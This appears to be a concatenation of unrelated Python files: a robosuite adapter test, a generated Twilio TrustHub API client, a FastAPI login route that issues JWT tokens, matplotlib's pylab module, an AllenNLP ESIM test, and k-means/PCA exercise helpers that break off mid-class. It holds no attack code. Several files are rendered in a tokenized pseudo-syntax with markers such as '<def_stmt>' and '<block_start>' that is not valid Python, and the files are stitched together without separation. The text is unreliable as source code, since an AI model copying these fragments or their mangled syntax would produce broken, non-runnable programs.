robosuite_adapter_kwargs.items()<block_start>self.assertEqual(getattr(env1 key) value)<line_sep>self.assertEqual(getattr(env2 key) value)<block_end><for_stmt>key,value env_kwargs.items()<block_start>self.assertEqual(getattr(env1.unwrapped key) value)<line_sep>self.assertEqual(getattr(env2.unwrapped key) value)<block_end><block_end><def_stmt>test_fails_with_invalid_environment_kwargs self<block_start>domain,task='Sawyer' 'Lift'<line_sep>robosuite_adapter_kwargs={'observation_keys':('joint_pos' 'invalid_key')}<with_stmt>self.assertRaises(AssertionError)<block_start>env=self.create_adapter(domain=domain task=task **robosuite_adapter_kwargs)<block_end><block_end><def_stmt>test_environment_kwargs self<block_start>env_kwargs={"has_renderer":<false> "has_offscreen_renderer":<false> "use_camera_obs":<false> "control_freq":10 "horizon":1000}<line_sep>env=RobosuiteAdapter(domain='Sawyer' task='Lift' **env_kwargs)<line_sep>observation1,reward,done,info=env.step(env.action_space.sample())<line_sep>self.assertAlmostEqual(reward 0.0)<for_stmt>key,expected_value env_kwargs.items()<block_start>actual_value=getattr(env.unwrapped key)<line_sep>self.assertEqual(actual_value expected_value)<block_end><block_end><def_stmt>test_render_rgb_array self<block_start>env=self.create_adapter()<with_stmt>self.assertRaises(NotImplementedError)<block_start>env.render()<block_end><block_end><def_stmt>test_render_human self<block_start>env=self.create_adapter()<with_stmt>self.assertRaises(NotImplementedError)<block_start>env.render()<block_end><block_end><def_stmt>test_fails_with_unnormalized_action_spec self<block_start><import_from_stmt>robosuite.environments.sawyer_lift SawyerLift<class_stmt>UnnormalizedEnv(SawyerLift)<block_start>@property<def_stmt>dof self<block_start><return>5<block_end>@property<def_stmt>action_spec self<block_start>low,high=np.ones(self.dof)<times>-2.0 np.ones(self.dof)<times>2.0<line_sep><return>low high<block_end><block_end>env=UnnormalizedEnv(has_renderer=<false> 
has_offscreen_renderer=<false> use_camera_obs=<false>)<with_stmt>self.assertRaises(AssertionError)<block_start>adapter=RobosuiteAdapter(domain=<none> task=<none> env=env)<block_end><block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>unittest.main()<block_end>
# coding=utf-8 r""" This code was generated by \ / _ _ _| _ _ | (_)\/(_)(_|\/| |(/_ v1.0.0 / / """<import_from_stmt>twilio.base deserialize<import_from_stmt>twilio.base values<import_from_stmt>twilio.base.instance_context InstanceContext<import_from_stmt>twilio.base.instance_resource InstanceResource<import_from_stmt>twilio.base.list_resource ListResource<import_from_stmt>twilio.base.page Page<class_stmt>TrustProductsChannelEndpointAssignmentList(ListResource)<block_start><def_stmt>__init__ self version trust_product_sid<block_start>""" Initialize the TrustProductsChannelEndpointAssignmentList :param Version version: Version that contains the resource :param trust_product_sid: The unique string that identifies the CustomerProfile resource. :returns: twilio.rest.trusthub.v1.trust_products.trust_products_channel_endpoint_assignment.TrustProductsChannelEndpointAssignmentList :rtype: twilio.rest.trusthub.v1.trust_products.trust_products_channel_endpoint_assignment.TrustProductsChannelEndpointAssignmentList """<line_sep>super(TrustProductsChannelEndpointAssignmentList self).__init__(version)<line_sep># Path Solution self._solution={'trust_product_sid':trust_product_sid }<line_sep>self._uri='/TrustProducts/{trust_product_sid}/ChannelEndpointAssignments'.format(**self._solution)<block_end><def_stmt>create self channel_endpoint_type channel_endpoint_sid<block_start>""" Create the TrustProductsChannelEndpointAssignmentInstance :param unicode channel_endpoint_type: The type of channel endpoint :param unicode channel_endpoint_sid: The sid of an channel endpoint :returns: The created TrustProductsChannelEndpointAssignmentInstance :rtype: twilio.rest.trusthub.v1.trust_products.trust_products_channel_endpoint_assignment.TrustProductsChannelEndpointAssignmentInstance """<line_sep>data=values.of({'ChannelEndpointType':channel_endpoint_type 'ChannelEndpointSid':channel_endpoint_sid })<line_sep>payload=self._version.create(method='POST' uri=self._uri data=data 
)<line_sep><return>TrustProductsChannelEndpointAssignmentInstance(self._version payload trust_product_sid=self._solution['trust_product_sid'] )<block_end><def_stmt>stream self channel_endpoint_sid=values.unset channel_endpoint_sids=values.unset limit=<none> page_size=<none><block_start>""" Streams TrustProductsChannelEndpointAssignmentInstance records from the API as a generator stream. This operation lazily loads records as efficiently as possible until the limit is reached. The results are returned as a generator, so this operation is memory efficient. :param unicode channel_endpoint_sid: The sid of an channel endpoint :param unicode channel_endpoint_sids: comma separated list of channel endpoint sids :param int limit: Upper limit for the number of records to return. stream() guarantees to never return more than limit. Default is no limit :param int page_size: Number of records to fetch per request, when not set will use the default value of 50 records. If no page_size is defined but a limit is defined, stream() will attempt to read the limit with the most efficient page size, i.e. min(limit, 1000) :returns: Generator that will yield up to limit results :rtype: list[twilio.rest.trusthub.v1.trust_products.trust_products_channel_endpoint_assignment.TrustProductsChannelEndpointAssignmentInstance] """<line_sep>limits=self._version.read_limits(limit page_size)<line_sep>page=self.page(channel_endpoint_sid=channel_endpoint_sid channel_endpoint_sids=channel_endpoint_sids page_size=limits['page_size'] )<line_sep><return>self._version.stream(page limits['limit'])<block_end><def_stmt>list self channel_endpoint_sid=values.unset channel_endpoint_sids=values.unset limit=<none> page_size=<none><block_start>""" Lists TrustProductsChannelEndpointAssignmentInstance records from the API as a list. Unlike stream(), this operation is eager and will load `limit` records into memory before returning. 
:param unicode channel_endpoint_sid: The sid of an channel endpoint :param unicode channel_endpoint_sids: comma separated list of channel endpoint sids :param int limit: Upper limit for the number of records to return. list() guarantees never to return more than limit. Default is no limit :param int page_size: Number of records to fetch per request, when not set will use the default value of 50 records. If no page_size is defined but a limit is defined, list() will attempt to read the limit with the most efficient page size, i.e. min(limit, 1000) :returns: Generator that will yield up to limit results :rtype: list[twilio.rest.trusthub.v1.trust_products.trust_products_channel_endpoint_assignment.TrustProductsChannelEndpointAssignmentInstance] """<line_sep><return>list(self.stream(channel_endpoint_sid=channel_endpoint_sid channel_endpoint_sids=channel_endpoint_sids limit=limit page_size=page_size ))<block_end><def_stmt>page self channel_endpoint_sid=values.unset channel_endpoint_sids=values.unset page_token=values.unset page_number=values.unset page_size=values.unset<block_start>""" Retrieve a single page of TrustProductsChannelEndpointAssignmentInstance records from the API. 
Request is executed immediately :param unicode channel_endpoint_sid: The sid of an channel endpoint :param unicode channel_endpoint_sids: comma separated list of channel endpoint sids :param str page_token: PageToken provided by the API :param int page_number: Page Number, this value is simply for client state :param int page_size: Number of records to return, defaults to 50 :returns: Page of TrustProductsChannelEndpointAssignmentInstance :rtype: twilio.rest.trusthub.v1.trust_products.trust_products_channel_endpoint_assignment.TrustProductsChannelEndpointAssignmentPage """<line_sep>data=values.of({'ChannelEndpointSid':channel_endpoint_sid 'ChannelEndpointSids':channel_endpoint_sids 'PageToken':page_token 'Page':page_number 'PageSize':page_size })<line_sep>response=self._version.page(method='GET' uri=self._uri params=data )<line_sep><return>TrustProductsChannelEndpointAssignmentPage(self._version response self._solution)<block_end><def_stmt>get_page self target_url<block_start>""" Retrieve a specific page of TrustProductsChannelEndpointAssignmentInstance records from the API. 
Request is executed immediately :param str target_url: API-generated URL for the requested results page :returns: Page of TrustProductsChannelEndpointAssignmentInstance :rtype: twilio.rest.trusthub.v1.trust_products.trust_products_channel_endpoint_assignment.TrustProductsChannelEndpointAssignmentPage """<line_sep>response=self._version.domain.twilio.request('GET' target_url )<line_sep><return>TrustProductsChannelEndpointAssignmentPage(self._version response self._solution)<block_end><def_stmt>get self sid<block_start>""" Constructs a TrustProductsChannelEndpointAssignmentContext :param sid: The unique string that identifies the resource :returns: twilio.rest.trusthub.v1.trust_products.trust_products_channel_endpoint_assignment.TrustProductsChannelEndpointAssignmentContext :rtype: twilio.rest.trusthub.v1.trust_products.trust_products_channel_endpoint_assignment.TrustProductsChannelEndpointAssignmentContext """<line_sep><return>TrustProductsChannelEndpointAssignmentContext(self._version trust_product_sid=self._solution['trust_product_sid'] sid=sid )<block_end><def_stmt>__call__ self sid<block_start>""" Constructs a TrustProductsChannelEndpointAssignmentContext :param sid: The unique string that identifies the resource :returns: twilio.rest.trusthub.v1.trust_products.trust_products_channel_endpoint_assignment.TrustProductsChannelEndpointAssignmentContext :rtype: twilio.rest.trusthub.v1.trust_products.trust_products_channel_endpoint_assignment.TrustProductsChannelEndpointAssignmentContext """<line_sep><return>TrustProductsChannelEndpointAssignmentContext(self._version trust_product_sid=self._solution['trust_product_sid'] sid=sid )<block_end><def_stmt>__repr__ self<block_start>""" Provide a friendly representation :returns: Machine friendly representation :rtype: str """<line_sep><return>'<Twilio.Trusthub.V1.TrustProductsChannelEndpointAssignmentList>'<block_end><block_end><class_stmt>TrustProductsChannelEndpointAssignmentPage(Page)<block_start><def_stmt>__init__ self 
version response solution<block_start>""" Initialize the TrustProductsChannelEndpointAssignmentPage :param Version version: Version that contains the resource :param Response response: Response from the API :param trust_product_sid: The unique string that identifies the CustomerProfile resource. :returns: twilio.rest.trusthub.v1.trust_products.trust_products_channel_endpoint_assignment.TrustProductsChannelEndpointAssignmentPage :rtype: twilio.rest.trusthub.v1.trust_products.trust_products_channel_endpoint_assignment.TrustProductsChannelEndpointAssignmentPage """<line_sep>super(TrustProductsChannelEndpointAssignmentPage self).__init__(version response)<line_sep># Path Solution self._solution=solution<block_end><def_stmt>get_instance self payload<block_start>""" Build an instance of TrustProductsChannelEndpointAssignmentInstance :param dict payload: Payload response from the API :returns: twilio.rest.trusthub.v1.trust_products.trust_products_channel_endpoint_assignment.TrustProductsChannelEndpointAssignmentInstance :rtype: twilio.rest.trusthub.v1.trust_products.trust_products_channel_endpoint_assignment.TrustProductsChannelEndpointAssignmentInstance """<line_sep><return>TrustProductsChannelEndpointAssignmentInstance(self._version payload trust_product_sid=self._solution['trust_product_sid'] )<block_end><def_stmt>__repr__ self<block_start>""" Provide a friendly representation :returns: Machine friendly representation :rtype: str """<line_sep><return>'<Twilio.Trusthub.V1.TrustProductsChannelEndpointAssignmentPage>'<block_end><block_end><class_stmt>TrustProductsChannelEndpointAssignmentContext(InstanceContext)<block_start><def_stmt>__init__ self version trust_product_sid sid<block_start>""" Initialize the TrustProductsChannelEndpointAssignmentContext :param Version version: Version that contains the resource :param trust_product_sid: The unique string that identifies the resource. 
:param sid: The unique string that identifies the resource :returns: twilio.rest.trusthub.v1.trust_products.trust_products_channel_endpoint_assignment.TrustProductsChannelEndpointAssignmentContext :rtype: twilio.rest.trusthub.v1.trust_products.trust_products_channel_endpoint_assignment.TrustProductsChannelEndpointAssignmentContext """<line_sep>super(TrustProductsChannelEndpointAssignmentContext self).__init__(version)<line_sep># Path Solution self._solution={'trust_product_sid':trust_product_sid 'sid':sid }<line_sep>self._uri='/TrustProducts/{trust_product_sid}/ChannelEndpointAssignments/{sid}'.format(**self._solution)<block_end><def_stmt>fetch self<block_start>""" Fetch the TrustProductsChannelEndpointAssignmentInstance :returns: The fetched TrustProductsChannelEndpointAssignmentInstance :rtype: twilio.rest.trusthub.v1.trust_products.trust_products_channel_endpoint_assignment.TrustProductsChannelEndpointAssignmentInstance """<line_sep>payload=self._version.fetch(method='GET' uri=self._uri )<line_sep><return>TrustProductsChannelEndpointAssignmentInstance(self._version payload trust_product_sid=self._solution['trust_product_sid'] sid=self._solution['sid'] )<block_end><def_stmt>delete self<block_start>""" Deletes the TrustProductsChannelEndpointAssignmentInstance :returns: True if delete succeeds, False otherwise :rtype: bool """<line_sep><return>self._version.delete(method='DELETE' uri=self._uri )<block_end><def_stmt>__repr__ self<block_start>""" Provide a friendly representation :returns: Machine friendly representation :rtype: str """<line_sep>context=' '.join('{}={}'.format(k v)<for>k,v self._solution.items())<line_sep><return>'<Twilio.Trusthub.V1.TrustProductsChannelEndpointAssignmentContext {}>'.format(context)<block_end><block_end><class_stmt>TrustProductsChannelEndpointAssignmentInstance(InstanceResource)<block_start><def_stmt>__init__ self version payload trust_product_sid sid=<none><block_start>""" Initialize the 
TrustProductsChannelEndpointAssignmentInstance :returns: twilio.rest.trusthub.v1.trust_products.trust_products_channel_endpoint_assignment.TrustProductsChannelEndpointAssignmentInstance :rtype: twilio.rest.trusthub.v1.trust_products.trust_products_channel_endpoint_assignment.TrustProductsChannelEndpointAssignmentInstance """<line_sep>super(TrustProductsChannelEndpointAssignmentInstance self).__init__(version)<line_sep># Marshaled Properties self._properties={'sid':payload.get('sid') 'trust_product_sid':payload.get('trust_product_sid') 'account_sid':payload.get('account_sid') 'channel_endpoint_type':payload.get('channel_endpoint_type') 'channel_endpoint_sid':payload.get('channel_endpoint_sid') 'date_created':deserialize.iso8601_datetime(payload.get('date_created')) 'url':payload.get('url') }<line_sep># Context self._context=<none><line_sep>self._solution={'trust_product_sid':trust_product_sid 'sid':sid<or>self._properties['sid'] }<block_end>@property<def_stmt>_proxy self<block_start>""" Generate an instance context for the instance, the context is capable of performing various actions. All instance actions are proxied to the context :returns: TrustProductsChannelEndpointAssignmentContext for this TrustProductsChannelEndpointAssignmentInstance :rtype: twilio.rest.trusthub.v1.trust_products.trust_products_channel_endpoint_assignment.TrustProductsChannelEndpointAssignmentContext """<if_stmt>self._context<is><none><block_start>self._context=TrustProductsChannelEndpointAssignmentContext(self._version trust_product_sid=self._solution['trust_product_sid'] sid=self._solution['sid'] )<block_end><return>self._context<block_end>@property<def_stmt>sid self<block_start>""" :returns: The unique string that identifies the resource :rtype: unicode """<line_sep><return>self._properties['sid']<block_end>@property<def_stmt>trust_product_sid self<block_start>""" :returns: The unique string that identifies the CustomerProfile resource. 
:rtype: unicode """<line_sep><return>self._properties['trust_product_sid']<block_end>@property<def_stmt>account_sid self<block_start>""" :returns: The SID of the Account that created the resource :rtype: unicode """<line_sep><return>self._properties['account_sid']<block_end>@property<def_stmt>channel_endpoint_type self<block_start>""" :returns: The type of channel endpoint :rtype: unicode """<line_sep><return>self._properties['channel_endpoint_type']<block_end>@property<def_stmt>channel_endpoint_sid self<block_start>""" :returns: The sid of an channel endpoint :rtype: unicode """<line_sep><return>self._properties['channel_endpoint_sid']<block_end>@property<def_stmt>date_created self<block_start>""" :returns: The ISO 8601 date and time in GMT when the resource was created :rtype: datetime """<line_sep><return>self._properties['date_created']<block_end>@property<def_stmt>url self<block_start>""" :returns: The absolute URL of the Identity resource :rtype: unicode """<line_sep><return>self._properties['url']<block_end><def_stmt>fetch self<block_start>""" Fetch the TrustProductsChannelEndpointAssignmentInstance :returns: The fetched TrustProductsChannelEndpointAssignmentInstance :rtype: twilio.rest.trusthub.v1.trust_products.trust_products_channel_endpoint_assignment.TrustProductsChannelEndpointAssignmentInstance """<line_sep><return>self._proxy.fetch()<block_end><def_stmt>delete self<block_start>""" Deletes the TrustProductsChannelEndpointAssignmentInstance :returns: True if delete succeeds, False otherwise :rtype: bool """<line_sep><return>self._proxy.delete()<block_end><def_stmt>__repr__ self<block_start>""" Provide a friendly representation :returns: Machine friendly representation :rtype: str """<line_sep>context=' '.join('{}={}'.format(k v)<for>k,v self._solution.items())<line_sep><return>'<Twilio.Trusthub.V1.TrustProductsChannelEndpointAssignmentInstance {}>'.format(context)<block_end><block_end>
"""Authentication routes: exchange user credentials for a JWT access token."""

from datetime import timedelta

from fastapi import APIRouter, Depends, HTTPException, status
from fastapi.security import OAuth2PasswordRequestForm

from ..config import settings
from ..security import (
    Token,
    User,
    authenticate_user,
    create_access_token,
    get_user,
)

# Token lifetime comes from application settings so it can be tuned per deployment.
ACCESS_TOKEN_EXPIRE_MINUTES = settings.security.access_token_expire_minutes

router = APIRouter()


@router.post("/token", response_model=Token)
async def login_for_access_token(
    form_data: OAuth2PasswordRequestForm = Depends(),
):
    """Validate the submitted credentials and issue a bearer access token.

    Returns a dict matching the ``Token`` response model; raises HTTP 401
    when the username/password pair does not resolve to a known ``User``.
    """
    user = authenticate_user(get_user, form_data.username, form_data.password)
    # Guard clause: reject anything that did not authenticate to a real User.
    if not (user and isinstance(user, User)):
        raise HTTPException(
            status_code=status.HTTP_401_UNAUTHORIZED,
            detail="Incorrect username or password",
            headers={"WWW-Authenticate": "Bearer"},
        )
    lifetime = timedelta(minutes=ACCESS_TOKEN_EXPIRE_MINUTES)
    token = create_access_token(data={"sub": user.username}, expires_delta=lifetime)
    return {"access_token": token, "token_type": "bearer"}
""" This is a procedural interface to the matplotlib object-oriented plotting library. The following plotting commands are provided; the majority have MATLAB |reg| [*]_ analogs and similar arguments. .. |reg| unicode:: 0xAE _Plotting commands acorr - plot the autocorrelation function annotate - annotate something in the figure arrow - add an arrow to the axes axes - Create a new axes axhline - draw a horizontal line across axes axvline - draw a vertical line across axes axhspan - draw a horizontal bar across axes axvspan - draw a vertical bar across axes axis - Set or return the current axis limits autoscale - turn axis autoscaling on or off, and apply it bar - make a bar chart barh - a horizontal bar chart broken_barh - a set of horizontal bars with gaps box - set the axes frame on/off state boxplot - make a box and whisker plot violinplot - make a violin plot cla - clear current axes clabel - label a contour plot clf - clear a figure window clim - adjust the color limits of the current image close - close a figure window colorbar - add a colorbar to the current figure cohere - make a plot of coherence contour - make a contour plot contourf - make a filled contour plot csd - make a plot of cross spectral density delaxes - delete an axes from the current figure draw - Force a redraw of the current figure errorbar - make an errorbar graph figlegend - make legend on the figure rather than the axes figimage - make a figure image figtext - add text in figure coords figure - create or change active figure fill - make filled polygons findobj - recursively find all objects matching some criteria gca - return the current axes gcf - return the current figure gci - get the current image, or None getp - get a graphics property grid - set whether gridding is on hist - make a histogram hold - set the axes hold state ioff - turn interaction mode off ion - turn interaction mode on isinteractive - return True if interaction mode is on imread - load image file into array imsave - 
save array as an image file imshow - plot image data ishold - return the hold state of the current axes legend - make an axes legend locator_params - adjust parameters used in locating axis ticks loglog - a log log plot matshow - display a matrix in a new figure preserving aspect margins - set margins used in autoscaling pause - pause for a specified interval pcolor - make a pseudocolor plot pcolormesh - make a pseudocolor plot using a quadrilateral mesh pie - make a pie chart plot - make a line plot plot_date - plot dates plotfile - plot column data from an ASCII tab/space/comma delimited file pie - pie charts polar - make a polar plot on a PolarAxes psd - make a plot of power spectral density quiver - make a direction field (arrows) plot rc - control the default params rgrids - customize the radial grids and labels for polar savefig - save the current figure scatter - make a scatter plot setp - set a graphics property semilogx - log x axis semilogy - log y axis show - show the figures specgram - a spectrogram plot spy - plot sparsity pattern using markers or image stem - make a stem plot subplot - make one subplot (numrows, numcols, axesnum) subplots - make a figure with a set of (numrows, numcols) subplots subplots_adjust - change the params controlling the subplot positions of current figure subplot_tool - launch the subplot configuration tool suptitle - add a figure title table - add a table to the plot text - add some text at location x,y to the current axes thetagrids - customize the radial theta grids and labels for polar tick_params - control the appearance of ticks and tick labels ticklabel_format - control the format of tick labels title - add a title to the current axes tricontour - make a contour plot on a triangular grid tricontourf - make a filled contour plot on a triangular grid tripcolor - make a pseudocolor plot on a triangular grid triplot - plot a triangular grid xcorr - plot the autocorrelation function of x and y xlim - set/get the xlimits 
ylim - set/get the ylimits xticks - set/get the xticks yticks - set/get the yticks xlabel - add an xlabel to the current axes ylabel - add a ylabel to the current axes autumn - set the default colormap to autumn bone - set the default colormap to bone cool - set the default colormap to cool copper - set the default colormap to copper flag - set the default colormap to flag gray - set the default colormap to gray hot - set the default colormap to hot hsv - set the default colormap to hsv jet - set the default colormap to jet pink - set the default colormap to pink prism - set the default colormap to prism spring - set the default colormap to spring summer - set the default colormap to summer winter - set the default colormap to winter spectral - set the default colormap to spectral _Event handling connect - register an event handler disconnect - remove a connected event handler _Matrix commands cumprod - the cumulative product along a dimension cumsum - the cumulative sum along a dimension detrend - remove the mean or besdt fit line from an array diag - the k-th diagonal of matrix diff - the n-th differnce of an array eig - the eigenvalues and eigen vectors of v eye - a matrix where the k-th diagonal is ones, else zero find - return the indices where a condition is nonzero fliplr - flip the rows of a matrix up/down flipud - flip the columns of a matrix left/right linspace - a linear spaced vector of N values from min to max inclusive logspace - a log spaced vector of N values from min to max inclusive meshgrid - repeat x and y to make regular matrices ones - an array of ones rand - an array from the uniform distribution [0,1] randn - an array from the normal distribution rot90 - rotate matrix k*90 degress counterclockwise squeeze - squeeze an array removing any dimensions of length 1 tri - a triangular matrix tril - a lower triangular matrix triu - an upper triangular matrix vander - the Vandermonde matrix of vector x svd - singular value decomposition zeros - a 
matrix of zeros _Probability normpdf - The Gaussian probability density function rand - random numbers from the uniform distribution randn - random numbers from the normal distribution _Statistics amax - the maximum along dimension m amin - the minimum along dimension m corrcoef - correlation coefficient cov - covariance matrix mean - the mean along dimension m median - the median along dimension m norm - the norm of vector x prod - the product along dimension m ptp - the max-min along dimension m std - the standard deviation along dimension m asum - the sum along dimension m ksdensity - the kernel density estimate _Time series analysis bartlett - M-point Bartlett window blackman - M-point Blackman window cohere - the coherence using average periodiogram csd - the cross spectral density using average periodiogram fft - the fast Fourier transform of vector x hamming - M-point Hamming window hanning - M-point Hanning window hist - compute the histogram of x kaiser - M length Kaiser window psd - the power spectral density using average periodiogram sinc - the sinc function of array x _Dates date2num - convert python datetimes to numeric representation drange - create an array of numbers for date plots num2date - convert numeric type (float days since 0001) to datetime _Other angle - the angle of a complex array griddata - interpolate irregularly distributed data to a regular grid load - Deprecated--please use loadtxt. loadtxt - load ASCII data into array. polyfit - fit x, y to an n-th order polynomial polyval - evaluate an n-th order polynomial roots - the roots of the polynomial coefficients in p save - Deprecated--please use savetxt. savetxt - save an array to an ASCII file. trapz - trapezoidal integration __end .. [*] MATLAB is a registered trademark of The MathWorks, Inc. 
"""<import_from_future_stmt> absolute_import division print_function unicode_literals <import_stmt>six<import_stmt>sys warnings<import_from_stmt>matplotlib.cbook flatten is_string_like exception_to_str silent_list iterable dedent<import_stmt>matplotlib<as>mpl<line_sep># make mpl.finance module available for backwards compatability, in case folks # using pylab interface depended on not having to import it <import_stmt>matplotlib.finance<import_from_stmt>matplotlib.dates date2num num2date datestr2num strpdate2num drange epoch2num num2epoch mx2num DateFormatter IndexDateFormatter DateLocator RRuleLocator YearLocator MonthLocator WeekdayLocator DayLocator HourLocator MinuteLocator SecondLocator rrule MO TU WE TH FR SA SU YEARLY MONTHLY WEEKLY DAILY HOURLY MINUTELY SECONDLY relativedelta<import_stmt>matplotlib.dates# Do we need this at all? # bring all the symbols in so folks can import them from # pylab in one fell swoop ## We are still importing too many things from mlab; more cleanup is needed. 
<import_from_stmt>matplotlib.mlab griddata stineman_interp slopes inside_poly poly_below poly_between is_closed_polygon path_length distances_along_curve vector_lengths<import_from_stmt>matplotlib.mlab window_hanning window_none detrend demean detrend_mean detrend_none detrend_linear entropy normpdf find longest_contiguous_ones longest_ones prepca prctile prctile_rank center_matrix rk4 bivariate_normal get_xyz_where get_sparse_matrix dist dist_point_to_segment segments_intersect fftsurr movavg exp_safe amap rms_flat l1norm l2norm norm_flat frange identity base_repr binary_repr log2 ispower2 rec_append_fields rec_drop_fields rec_join csv2rec rec2csv isvector<import_stmt>matplotlib.mlab<as>mlab<import_stmt>matplotlib.cbook<as>cbook<import_from_stmt>numpy *<import_from_stmt>numpy.fft *<import_from_stmt>numpy.random *<import_from_stmt>numpy.linalg *<import_from_stmt>matplotlib.pyplot *<line_sep># provide the recommended module abbrevs in the pylab namespace <import_stmt>matplotlib.pyplot<as>plt<import_stmt>numpy<as>np<import_stmt>numpy.ma<as>ma<line_sep># don't let numpy's datetime hide stdlib <import_stmt>datetime<line_sep># This is needed, or bytes will be numpy.random.bytes from # "from numpy.random import *" above bytes=__builtins__['bytes']<line_sep>
# pylint: disable=no-self-use,invalid-name <import_from_future_stmt> division<import_from_future_stmt> absolute_import<import_stmt>numpy<import_from_stmt>numpy.testing assert_almost_equal<import_from_stmt>allennlp.common.testing ModelTestCase<class_stmt>TestESIM(ModelTestCase)<block_start><def_stmt>setUp self<block_start>super(TestESIM self).setUp()<line_sep>self.set_up_model(self.FIXTURES_ROOT/u'esim'/u'experiment.json' self.FIXTURES_ROOT/u'data'/u'snli.jsonl')<block_end><def_stmt>test_forward_pass_runs_correctly self<block_start>training_tensors=self.dataset.as_tensor_dict()<line_sep>output_dict=self.model(**training_tensors)<line_sep>assert_almost_equal(numpy.sum(output_dict[u"label_probs"][0].data.numpy() -1) 1 decimal=6)<block_end><def_stmt>test_model_can_train_save_and_load self<block_start>self.ensure_model_can_train_save_and_load(self.param_file)<block_end><def_stmt>test_batch_predictions_are_consistent self<block_start>self.ensure_batch_predictions_are_consistent()<block_end><block_end>
import sys

import numpy as np
from matplotlib import pyplot
from matplotlib.animation import FuncAnimation
import matplotlib as mpl

sys.path.append('..')

from submission import SubmissionBase


def displayData(X, example_width=None, figsize=(10, 10)):
    """
    Displays 2D data in a nice grid.

    Parameters
    ----------
    X : array_like
        The input data of size (m x n) where m is the number of examples
        and n is the number of features.

    example_width : int, optional
        The width of each 2-D image in pixels. If not provided, the image
        is assumed to be square, and the width is the floor of the square
        root of total number of pixels.

    figsize : tuple, optional
        A 2-element tuple indicating the width and height of figure in
        inches.
    """
    # Compute rows, cols
    if X.ndim == 2:
        m, n = X.shape
    elif X.ndim == 1:
        n = X.size
        m = 1
        X = X[None]  # Promote to a 2 dimensional array
    else:
        raise IndexError('Input X should be 1 or 2 dimensional.')

    example_width = example_width or int(np.round(np.sqrt(n)))
    example_height = int(n / example_width)

    # Compute number of items to display
    display_rows = int(np.floor(np.sqrt(m)))
    display_cols = int(np.ceil(m / display_rows))

    fig, ax_array = pyplot.subplots(display_rows, display_cols, figsize=figsize)
    fig.subplots_adjust(wspace=0.025, hspace=0.025)

    # subplots() returns a bare Axes when only one cell is requested
    ax_array = [ax_array] if m == 1 else ax_array.ravel()

    for i, ax in enumerate(ax_array):
        # order='F' because the images are stored column-major (MATLAB style)
        ax.imshow(X[i].reshape(example_height, example_width, order='F'),
                  cmap='gray')
        ax.axis('off')


def featureNormalize(X):
    """
    Normalizes the features in X returns a normalized version of X where
    the mean value of each feature is 0 and the standard deviation is 1.
    This is often a good preprocessing step to do when working with
    learning algorithms.

    Parameters
    ----------
    X : array_like
        An dataset which is a (m x n) matrix, where m is the number of
        examples, and n is the number of dimensions for each example.

    Returns
    -------
    X_norm : array_like
        The normalized input dataset.

    mu : array_like
        A vector of size n corresponding to the mean for each dimension
        across all examples.

    sigma : array_like
        A vector of size n corresponding to the standard deviations for
        each dimension across all examples.
    """
    mu = np.mean(X, axis=0)
    X_norm = X - mu

    # ddof=1 gives the sample standard deviation (matches MATLAB's std)
    sigma = np.std(X_norm, axis=0, ddof=1)
    X_norm /= sigma
    return X_norm, mu, sigma


def plotProgresskMeans(i, X, centroid_history, idx_history):
    """
    A helper function that displays the progress of k-Means as it is
    running. It is intended for use only with 2D data. It plots data
    points with colors assigned to each centroid. With the previous
    centroids, it also plots a line between the previous locations and
    current locations of the centroids.

    Parameters
    ----------
    i : int
        Current iteration number of k-means. Used for matplotlib animation
        function.

    X : array_like
        The dataset, which is a matrix (m x n). Note since the plot only
        supports 2D data, n should be equal to 2.

    centroid_history : list
        A list of computed centroids for all iteration.

    idx_history : list
        A list of computed assigned indices for all iterations.
    """
    K = centroid_history[0].shape[0]
    pyplot.gcf().clf()
    cmap = pyplot.cm.rainbow
    norm = mpl.colors.Normalize(vmin=0, vmax=2)

    for k in range(K):
        # Trajectory of centroid k across iterations 0..i
        current = np.stack([c[k, :] for c in centroid_history[:i + 1]], axis=0)
        pyplot.plot(current[:, 0], current[:, 1],
                    '-Xk',
                    mec='k',
                    lw=2,
                    ms=10,
                    mfc=cmap(norm(k)),
                    mew=2)

    # Fix: scatter the dataset once per frame, not once per centroid. The
    # previous version re-plotted all m points K times inside the loop,
    # producing an identical picture at K times the cost.
    pyplot.scatter(X[:, 0], X[:, 1],
                   c=idx_history[i],
                   cmap=cmap,
                   marker='o',
                   s=8**2,
                   linewidths=1,)
    pyplot.grid(False)
    pyplot.title('Iteration number %d' % (i + 1))


def runkMeans(X, centroids, findClosestCentroids, computeCentroids,
              max_iters=10, plot_progress=False):
    """
    Runs the K-means algorithm.

    Parameters
    ----------
    X : array_like
        The data set of size (m, n). Each row of X is a single example of
        n dimensions. The data set is a total of m examples.

    centroids : array_like
        Initial centroid location for each clusters. This is a matrix of
        size (K, n). K is the total number of clusters and n is the
        dimensions of each data point.

    findClosestCentroids : func
        A function (implemented by student) reference which computes the
        cluster assignment for each example.

    computeCentroids : func
        A function(implemented by student) reference which computes the
        centroid of each cluster.

    max_iters : int, optional
        Specifies the total number of interactions of K-Means to execute.

    plot_progress : bool, optional
        A flag that indicates if the function should also plot its progress
        as the learning happens. This is set to false by default.

    Returns
    -------
    centroids : array_like
        A (K x n) matrix of the computed (updated) centroids.

    idx : array_like
        A vector of size (m,) for cluster assignment for each example in
        the dataset. Each entry in idx is within the range [0 ... K-1].

    anim : FuncAnimation, optional
        A matplotlib animation object which can be used to embed a video
        within the jupyter notebook. This is only returned if
        `plot_progress` is `True`.
    """
    K = centroids.shape[0]
    idx = None
    idx_history = []
    centroid_history = []

    for i in range(max_iters):
        idx = findClosestCentroids(X, centroids)

        if plot_progress:
            # Record the state *before* updating, so each frame shows the
            # assignment that produced the next centroid positions.
            idx_history.append(idx)
            centroid_history.append(centroids)

        centroids = computeCentroids(X, idx, K)

    if plot_progress:
        fig = pyplot.figure()
        anim = FuncAnimation(fig, plotProgresskMeans,
                             frames=max_iters,
                             interval=500,
                             repeat_delay=2,
                             fargs=(X, centroid_history, idx_history))
        return centroids, idx, anim

    return centroids, idx


class Grader(SubmissionBase):
    """Submission grader for the k-means clustering and PCA exercise."""

    # Random Test Cases (fixed deterministic fixtures, MATLAB column order)
    X = np.sin(np.arange(1, 166)).reshape(15, 11, order='F')
    Z = np.cos(np.arange(1, 122)).reshape(11, 11, order='F')
    C = Z[:5, :]
    idx = np.arange(1, 16) % 3

    def __init__(self):
        part_names = ['Find Closest Centroids (k-Means)',
                      'Compute Centroid Means (k-Means)',
                      'PCA',
                      'Project Data (PCA)',
                      'Recover Data (PCA)']
        super().__init__('k-means-clustering-and-pca', part_names)

    def __iter__(self):
